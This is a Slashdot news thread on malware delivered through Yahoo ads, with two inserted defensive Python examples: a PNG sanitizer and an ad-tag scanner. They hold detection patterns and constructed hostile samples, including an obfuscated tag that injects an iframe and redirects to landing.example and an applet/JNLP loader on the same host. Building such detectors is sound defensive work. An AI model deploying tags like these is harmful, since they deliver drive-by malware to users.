Yahoo Advertising Serves Up Malware For Thousands
wjcofkc writes "Thousands of users have been affected by malicious advertisements served by ads.yahoo.com. The attack, which lasted several days, exploited vulnerabilities in Java and installed malware. The Netherlands-based Fox-IT estimates that the infection rate was at about 27,000 infections per hour. In response to the breach in security, Yahoo issued the following statement, 'At Yahoo, we take the safety and privacy of our users seriously. We recently identified an ad designed to spread malware to some of our users. We immediately removed it and will continue to monitor and block any ads being used for this activity.' While the source of the attack remains unknown, Fox-IT says it appears to be 'financially motivated.' The Washington Post cites this incident as a reminder that Java has become an Internet security menace."
Become? (Score:5, Insightful)
As far as I've been concerned, Java and Javascript have both always been security menaces.
Letting web-sites and advertisers execute code has been a recipe for problems for a long time, which is why many of us here likely already block it.
This is just another example of why we can't trust the companies doing the advertising, because they're part of the problem -- if Yahoo is serving malware, Yahoo can't be trusted.
Image/text only ads (Score:5, Insightful)
This wouldn't be an issue if they could only serve image or text only ads. Possible image based exploits can easily be prevented by re-saving the uploaded image so that the image only contains valid content.
But no, ad farms want to provide functionality to reach maximum annoyance for the users. You can blame Java all you want, but it's not the source of this problem.
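The "re-save the uploaded image" idea from the post above, worked through as an added example (this is not code from the original thread or from any ad network). Rather than decode and re-render through an image library, it rebuilds an untrusted PNG from scratch: only the chunks needed to draw the picture are copied, every CRC is verified, the pixel stream is decompressed, checked against the dimensions declared in IHDR, and recompressed, and anything after IEND is discarded. Ancillary chunks (tEXt, iCCP, custom types) and the bytes after IEND are the usual places a polyglot or smuggled payload lives. Interlaced (Adam7) images are rejected to keep the size check simple; that restriction and the sample image are this example's own assumptions.

```python
"""Rebuild an untrusted PNG so that only pixel-bearing chunks survive."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Samples per pixel for each PNG colour type (greyscale, RGB, palette, grey+alpha, RGBA).
_CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk with a freshly computed CRC."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def _iter_chunks(blob: bytes):
    """Yield (type, data, offset_after_chunk); stop at IEND; reject bad CRCs."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 12 <= len(blob):
        (length,) = struct.unpack(">I", blob[pos:pos + 4])
        ctype = blob[pos + 4:pos + 8]
        data = blob[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        if len(data) != length or (zlib.crc32(ctype + data) & 0xFFFFFFFF) != crc:
            raise ValueError("corrupt chunk %r" % ctype)
        pos += 12 + length
        yield ctype, data, pos
        if ctype == b"IEND":
            return
    raise ValueError("no IEND chunk")


def chunk_types(blob: bytes) -> list:
    return [ctype for ctype, _, _ in _iter_chunks(blob)]


def trailing_bytes(blob: bytes) -> int:
    """How many bytes follow IEND: a PNG/HTML or PNG/JAR polyglot hides its tail here."""
    end = 0
    for _, _, end in _iter_chunks(blob):
        pass
    return len(blob) - end


def pixel_bytes(blob: bytes) -> bytes:
    """Concatenated, decompressed scanlines (filter byte + samples per row)."""
    return zlib.decompress(b"".join(d for c, d, _ in _iter_chunks(blob) if c == b"IDAT"))


def sanitize_png(blob: bytes) -> bytes:
    ihdr, palette, idat = None, [], bytearray()
    for ctype, data, _ in _iter_chunks(blob):
        if ctype == b"IHDR":
            if len(data) != 13:
                raise ValueError("bad IHDR")
            ihdr = data
        elif ctype in (b"PLTE", b"tRNS"):   # needed to render palette images
            palette.append((ctype, data))
        elif ctype == b"IDAT":
            idat += data
        # every other chunk type is dropped here
    if ihdr is None or not idat:
        raise ValueError("missing IHDR or IDAT")
    width, height, depth, colour, _, _, interlace = struct.unpack(">IIBBBBB", ihdr)
    if interlace or colour not in _CHANNELS:
        raise ValueError("unsupported image layout")   # simplification for this example
    row = (width * _CHANNELS[colour] * depth + 7) // 8
    expected = height * (1 + row)
    d = zlib.decompressobj()
    raw = d.decompress(bytes(idat), expected + 1)    # cap output: no decompression bombs
    if not d.eof or len(raw) != expected:
        raise ValueError("pixel stream does not match declared dimensions")
    out = bytearray(PNG_SIG) + _chunk(b"IHDR", ihdr)
    for ctype, data in palette:
        out += _chunk(ctype, data)
    out += _chunk(b"IDAT", zlib.compress(raw, 9)) + _chunk(b"IEND", b"")
    return bytes(out)


def make_sample_png() -> bytes:
    """Constructed 1x1 red PNG carrying a tEXt chunk and junk after IEND (not a real ad)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    pixels = b"\x00\xff\x00\x00"   # filter 0, then one RGB pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr)
    png += _chunk(b"tEXt", b"Comment\x00<script>alert(1)</script>")
    png += _chunk(b"IDAT", zlib.compress(pixels)) + _chunk(b"IEND", b"")
    return png + b"<html><script>alert(1)</script></html>"   # polyglot tail


if __name__ == "__main__":
    s = make_sample_png()
    print(chunk_types(s), trailing_bytes(s))
    print(chunk_types(sanitize_png(s)), trailing_bytes(sanitize_png(s)))
```

A re-encode through a real decoder (Pillow, libpng) additionally normalises the scanline filters and catches more malformed inputs; the chunk whitelist above is the minimum that removes the hiding places while keeping the image displayable, and it still has to be run in a process that is not the ad server itself, since decoding attacker-controlled images is exactly where decoder bugs get hit.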
"has become"? (Score:1, Insightful)
a reminder that Java has become an Internet security menace
Java has always been a security menace.
And this is why... (Score:4, Insightful)
... using ad blocking and/or host files to deep-six ad networks not only produces a nicer user experience, but it's a valid security measure.
Trusting the web site is not enough. You have to trust the ad network too. Since any Joe Schmoe can buy ad space on an ad network, trusting the ad network means you're trusting Joe Schmoe.
I don't know about you guys, but I don't.
--
BMO
Yahoo is getting worse everyday (Score:3, Insightful)
New Yahoo Mail = complete unusable dog shit
New Flickr = complete fuck up! They don't even read user feedback.
New Ad delivery = source of malware! Even porn sites don't do that.
Re:Become? (Score:5, Insightful)
Java as a language is pretty much as secure as any other. Allowing it to run arbitrary code as 'applets' by default is a huge problem as the sandboxing seems quite poor.
Re:Become? (Score:5, Insightful)
In the abstract, as a standalone app, sure.
But on the web? No bloody way. Certainly not by default -- because it's always been a vector for annoying crap and malware.
Re:"has become"? (Score:2, Insightful)
Not sure if parent is trolling, or just confused.
Most of us know the difference between Java (a perfectly secure language) and the ability to run applets in a browser (a feature that can be exploited if the sandboxing is insecure). It doesn't matter whether we're talking about Java Applets or ActiveX. Hell, even interactive PDF forms have been used as attack vectors.
Re:Become? (Score:5, Insightful)
Any other language deployed the same way would offer a very similar attack surface. Simply put, it's the new ActiveX.
Re:Image/text only ads (Score:4, Insightful)
Indeed, the ad ops teams that "screen" these ads can't read code, and even if they could, the code in the ad tags is "minified" JS and they just can't logistically read each ad tag because of the sheer number of ads they need to run each day/week.
If Java didn't exist, nor Flash or Acrobat, these criminals would STILL be using the ad networks to compromise the browser itself. That's not to say the plugin model is a good one, but it's important to focus on the real problem.
This is true for all websites too. I suspect the WashPo uses the same ad ops standards Yahoo does, same as Slashdot, same as everyone. It's ad networks running arbitrary, 3rd-party, unknown code on users machines that's really fucking dangerous.
Yahoo knows (Score:5, Insightful)
So if your goal with a Java ad is to circumvent something that Adobe has blocked then it probably should remain blocked. On top of that most users have turned off Java so it can't be to reach a wider audience.
So when Yahoo allowed advertisers to use Java, they knew perfectly well that the advertisers were up to no good whatsoever. Their acting surprised that some of the scumbags took it even further is total BS.
Basically at this point, anyone who has Java turned on in the browser is the same as having a house with a week's worth of newspapers stacked up at the front door. Effectively a greeting card inviting the criminals in.
Yahoo doesn't immediately know (Score:4, Insightful)
The ad didn't contain a Java applet.
It directed people to a website that then delivered the malware. Apparently it automatically redirected the browser, but that hasn't been confirmed.
So Yahoo allows Javascript in the ads, not Java.
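Two posts above describe the actual mechanism (a JavaScript ad tag that redirects the browser to the site serving the Java exploit) and why ad ops can't vet tags by eye (minified, obfuscated code at volume). As an added example, not code from the thread or from Yahoo, here is the kind of static pre-flight check an ad platform can run on every tag: undo the cheap obfuscation layers (String.fromCharCode, %xx and \x escapes, split string literals), then look for the primitives a malvertising tag needs to hand the visitor off to a landing page: navigation sinks, injected iframes or remote scripts, applet/JNLP launch, meta refresh, and string-evaluating calls. The three tags and the landing.example hostname are constructed for the demonstration; the sink list is this example's own heuristic, not any platform's policy.

```python
"""Heuristic pre-flight scan of a third-party ad tag for redirect/injection primitives."""
import re
from urllib.parse import unquote

# Sinks a malvertising creative uses to navigate the browser or pull in third-party code.
_SINKS = {
    "redirect": re.compile(r"(?:window\.|top\.|parent\.|document\.)?\blocation(?:\.href|\.replace|\.assign|\s*=)", re.I),
    "iframe": re.compile(r"<iframe\b", re.I),
    "remote_script": re.compile(r"<script\b[^>]*\bsrc\s*=", re.I),
    "java_applet": re.compile(r"<applet\b|application/x-java-applet|\.jnlp\b|deployJava", re.I),
    "meta_refresh": re.compile(r"<meta\b[^>]*http-equiv\s*=\s*['\"]?refresh", re.I),
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\(|setTimeout\s*\(\s*['\"]", re.I),
}
_FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([\d\s,]+)\)", re.I)


def deobfuscate(js: str, rounds: int = 3) -> str:
    """Peel common single-layer obfuscation; repeat a few times for nested layers."""
    text = js
    for _ in range(rounds):
        prev = text
        text = _FROMCHARCODE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), text)
        text = unquote(text)                                   # %3D -> '=' etc.
        text = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
        text = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
        text = text.replace("'+'", "").replace('"+"', "")      # "loc"+"ation" style splitting
        if text == prev:
            break
    return text


def scan_ad_tag(js: str) -> list:
    """Return sorted finding names; 'obfuscation' is added when decoding changed the tag."""
    decoded = deobfuscate(js)
    findings = {name for name, rx in _SINKS.items() if rx.search(decoded)}
    if decoded != js and findings:
        findings.add("obfuscation")
    return sorted(findings)


# Constructed sample creatives (not the ad from the story, whose code is not public).
BENIGN_TAG = ('<a href="https://advertiser.example/landing">'
              '<img src="https://cdn.example/banner.gif" width="300" height="250"></a>')

REDIRECT_TAG = (
    "var a=String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34);"
    'document.write(a+"http://landing.example/x.html"+String.fromCharCode(34,62));'
    "setTimeout(\"window.location%3Dunescape('http%3A%2F%2Flanding.example%2Fjar')\",500);"
)

APPLET_TAG = ('<object type="application/x-java-applet" width="1" height="1">'
              '<param name="jnlp_href" value="http://landing.example/x.jnlp"></object>')


if __name__ == "__main__":
    for name, tag in (("benign", BENIGN_TAG), ("redirect", REDIRECT_TAG), ("applet", APPLET_TAG)):
        print(name, scan_ad_tag(tag))
```

This catches the cheap tricks, which is what gets past a human skimming minified code; it does not catch a tag that only misbehaves at runtime, geofences its payload, or fetches the redirect from a second-stage URL. Those need the creative rendered in an instrumented browser and re-checked periodically, because the tag a platform approved is not necessarily the tag it serves a week later.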